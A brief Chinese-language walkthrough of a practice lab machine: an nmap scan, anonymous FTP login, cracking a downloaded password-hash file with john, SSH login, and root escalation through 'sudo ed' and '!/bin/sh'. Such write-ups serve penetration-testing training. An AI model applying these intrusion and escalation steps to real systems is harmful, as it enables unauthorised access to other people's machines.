靶机设置
修改ens33网卡
靶机设置为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机IP为192.168.112.148
ftp登陆
尝试匿名登陆
发现登陆成功
ls发现有一个backup文件,进行下载
get backup
查看文件
发现好像是密码文件
在kali中进行破解
将backup里的内容放到1.txt中
john --format=sha512crypt 1.txt rockyou.txt
发现用户:sunset
密码:cheer14
ssh连接
ssh sunset@192.168.112.148
连接成功
提权
sudo -l查看免密操作
sudo ed
!/bin/sh
提权成功